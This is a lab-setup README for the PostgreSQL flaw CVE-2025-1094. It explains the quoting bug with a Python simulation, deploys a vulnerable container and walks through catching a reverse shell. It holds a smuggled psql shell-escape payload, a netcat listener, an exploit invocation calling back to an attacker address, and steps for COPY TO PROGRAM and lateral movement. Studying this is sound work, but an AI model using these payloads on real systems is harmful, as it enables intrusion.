# 🛠️ CVE-2025-1094 Lab Setup
> ⚠️ **Disclaimer**
> This lab is for **educational and research purposes only**.
> Do **NOT** use any of the information or techniques demonstrated here on systems you do not own or have explicit permission to test. Unauthorized use of these methods **may violate laws** and result in severe penalties.
---
## 📌 Overview
**CVE-2025-1094** is a high-severity SQL injection vulnerability in **PostgreSQL**'s client library **libpq**, and therefore in the interactive tool **`psql`** built on it. The affected quoting functions (`PQescapeLiteral`, `PQescapeIdentifier`, `PQescapeString`, `PQescapeStringConn`) mishandle invalid multibyte (UTF-8) input. It is fixed in PostgreSQL 17.3, 16.7, 15.11, 14.16 and 13.19; this lab uses **14.15**, the last vulnerable release of the 14 branch.
An attacker who controls a string that an application quotes with these functions and then passes to `psql` can break out of the string literal and inject SQL. Because `psql` also interprets meta-commands such as `\!` (shell escape), the injection can be turned into **Remote Code Execution (RCE)** on the host running `psql`.
---
## 🧨 Root Cause
The quoting functions assume that a byte announcing a multibyte UTF-8 sequence (for example `0xC0`, which claims a 2-byte character) is followed by that many valid continuation bytes. They never verify this, so a single quote placed right after such a byte is copied through as "part of the character" and is never doubled. When `psql` later reads the quoted string, its own lexer does not treat the pair as one character: the stray quote terminates the literal, and everything after it is parsed as new input, either more SQL or `psql` meta-commands such as `\!` (shell escape), which run a command on the machine where `psql` is executing.
`COPY ... TO PROGRAM` is a separate, server-side path: once an attacker can inject SQL that runs as a superuser (or as a member of `pg_execute_server_program`), it executes a command on the database server itself.
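To make the root cause concrete, here is an added example written for this page (it is not libpq's or psql's code) that models both halves of the bug in Python: a quoting routine that, like the pre-fix `PQescapeLiteral`, trusts the length announced by a UTF-8 lead byte, next to a hardened version that rejects malformed sequences the way the fixed libpq reports an error, plus a toy reader that scans the quoted result the way `psql` consumes input and reports any meta-command it would see. The payload bytes, the wrapper statement and all function names are constructed for the example.

```python
# Added example for this page: a simplified model of CVE-2025-1094.
# It is NOT libpq's or psql's code; names, payload and the wrapper
# statement are constructed for illustration.

QUOTE = ord("'")
BACKSLASH = ord("\\")

# Constructed attacker-controlled value: an invalid lead byte that claims a
# 2-byte character, followed by the quote it will "swallow", then a psql
# shell-escape meta-command on its own line and a comment to eat the rest.
MALFORMED_PAYLOAD = b"\xc0'\n\\! id\n--"


def utf8_mblen(lead: int) -> int:
    """Sequence length announced by a UTF-8 lead byte (modelled on pg_utf_mblen)."""
    if lead < 0x80:
        return 1
    if (lead & 0xE0) == 0xC0:
        return 2
    if (lead & 0xF0) == 0xE0:
        return 3
    if (lead & 0xF8) == 0xF0:
        return 4
    return 1


def _valid_utf8(chunk: bytes) -> bool:
    try:
        chunk.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def escape_literal_naive(value: bytes) -> bytes:
    """Vulnerable behaviour: copies mblen bytes after a lead byte without checking
    that they are continuation bytes, so a quote hidden there is never doubled."""
    out = bytearray(b"'")
    i = 0
    while i < len(value):
        n = utf8_mblen(value[i])
        if n == 1 and value[i] == QUOTE:
            out += b"''"
        else:
            out += value[i:i + n]
        i += n
    out += b"'"
    return bytes(out)


def escape_literal_fixed(value: bytes) -> bytes:
    """Hardened behaviour: refuse input whose multibyte sequences are malformed
    or truncated instead of quoting it (the fixed libpq reports an error)."""
    out = bytearray(b"'")
    i = 0
    while i < len(value):
        n = utf8_mblen(value[i])
        chunk = value[i:i + n]
        if n > 1 and (len(chunk) != n or not _valid_utf8(chunk)):
            raise ValueError(f"invalid multibyte sequence at offset {i}")
        out += b"''" if chunk == b"'" else chunk
        i += n
    out += b"'"
    return bytes(out)


def meta_commands_seen(text: bytes) -> list:
    """Toy model of how psql consumes input: a byte-wise scan that tracks whether
    it is inside a single-quoted literal ('' is an escaped quote) and, outside a
    literal, treats a backslash as the start of a meta-command running to end of
    line. psql's real lexer is far richer; this models only the part that matters."""
    found = []
    in_literal = False
    i = 0
    while i < len(text):
        b = text[i]
        if in_literal:
            if b == QUOTE:
                if text[i + 1:i + 2] == b"'":
                    i += 2          # doubled quote stays inside the literal
                    continue
                in_literal = False  # a lone quote closes it
        elif b == QUOTE:
            in_literal = True
        elif b == BACKSLASH:
            end = text.find(b"\n", i)
            end = len(text) if end == -1 else end
            found.append(text[i:end])
            i = end
            continue
        i += 1
    return found


def simulate(payload: bytes, escape) -> list:
    """Quote an attacker-controlled value with the given routine, embed it the way
    a wrapper script would, and report the meta-commands psql would then see."""
    stmt = b"SELECT * FROM users WHERE username = " + escape(payload) + b";\n"
    return meta_commands_seen(stmt)


def fixed_rejects(payload: bytes) -> bool:
    """True if the hardened routine refuses to quote the payload."""
    try:
        escape_literal_fixed(payload)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for name, esc in (("naive", escape_literal_naive), ("fixed", escape_literal_fixed)):
        try:
            print(name, "->", simulate(MALFORMED_PAYLOAD, esc))
        except ValueError as exc:
            print(name, "-> rejected:", exc)
```

With the naive routine, `simulate(MALFORMED_PAYLOAD, escape_literal_naive)` reports the `\! id` meta-command: the quote after `0xC0` was copied through undoubled, the toy reader closed the literal on it, and the backslash line became a command. The hardened routine raises instead of quoting, which is the same design choice as the fix: a quoting function must validate the encoding of what it quotes, because the consumer (here `psql`) will not decode it the same way. Ordinary input such as `O'Brien` or a valid `é` is quoted identically by both.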
---
## 🔥 Impact and Attack Scenarios
- **SQL Injection → RCE**: malformed UTF-8 in an attacker-controlled value defeats the client-side quoting, and `psql` meta-commands (`\!`) turn the injected input into command execution on the host running `psql`.
- **Abuse of `COPY ... TO PROGRAM`**: with injected SQL running as a superuser (or a member of `pg_execute_server_program`), attackers can execute arbitrary shell commands on the database server, such as:
- Reverse shells
- Reading sensitive files (`/etc/passwd`)
- Combining with other CVEs for full unauthenticated RCE (the BeyondTrust chain with CVE-2024-12356 is the publicly documented case)
- **Integration Risk**: software that feeds untrusted input to `psql` (e.g., BeyondTrust PRA and Remote Support) is particularly exposed, because the vulnerable quoting and the `\!` meta-command live in the same client.
---
## 🧪 Lab Requirements
### 🐳 Victim (Ubuntu)
Install Docker:
```bash
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER
```
👉 **Reboot** or **log out & log in again** to apply Docker group permissions.
---
### 🐍 Attacker (Kali)
Install Python and dependencies:
```bash
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional
```
✅ Ensure **network connectivity** between attacker and victim machines.
---
## ⚙️ Step 1 – Deploy Vulnerable PostgreSQL Container (Victim)
1. **Pull PostgreSQL 14.15 image**:
```bash
docker pull postgres:14.15
```
2. **Run the container**:
```bash
docker run --name vulnerable_postgres -e POSTGRES_USER=postgres123 -e POSTGRES_PASSWORD=StrongP@ssWord -e POSTGRES_DB=labdb -p 5432:5432 -d postgres:14.15
```
3. **Wait a few seconds** for initialization (until `pg_isready` or the container log reports that the server accepts connections), then create a demo table:
```bash
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
id SERIAL PRIMARY KEY,
username TEXT,
password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF
```
---
### ✅ Step 1.5 – Verify the container and database setup
After starting the container, verify everything is working with the following commands:
**1. Check that the PostgreSQL container is running:**
```bash
sudo docker ps
```
📌 You should see a container named `vulnerable_postgres` listening on port `5432`.
---
**2. Access the container and inspect the database:**
```bash
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb
```
Inside the `psql` shell, run:
```sql
SELECT * FROM users;
```
Expected output:
```
id | username | password
----+----------+-------------
1 | admin | password123
(1 row)
```
Exit from `psql`:
```
\q
```
✅ Your vulnerable PostgreSQL instance is running and ready for exploitation. Note that `postgres123` is the image's bootstrap superuser: that is what makes `COPY ... TO PROGRAM` available to injected SQL, since it requires superuser rights or membership in `pg_execute_server_program`.
---
**3. If the container was stopped (for example after a reboot), start it again:**
```bash
sudo docker start vulnerable_postgres
```
---
## 📡 Step 2 – Exploit from Attacker Machine
1. **Start a listener** on the attacker machine to catch the reverse shell:
```bash
nc -lvnp 4444
```
2. **Run the exploit script** (adjust IP and port if needed):
```bash
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
```
3. If successful, you’ll receive a reverse shell from the vulnerable PostgreSQL container 🎉
```bash
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.
```
---
## 🧰 Example Exploitation Flow
1. Inject malformed UTF-8 to bypass input validation
2. Exploit `COPY ... TO PROGRAM` to execute arbitrary shell commands
3. Reverse shell connects back to the attacker machine
4. Escalate privileges or move laterally inside the environment
---
💡 **Tip:** You can snapshot this container with `docker commit` and reuse the resulting image later without rebuilding the environment.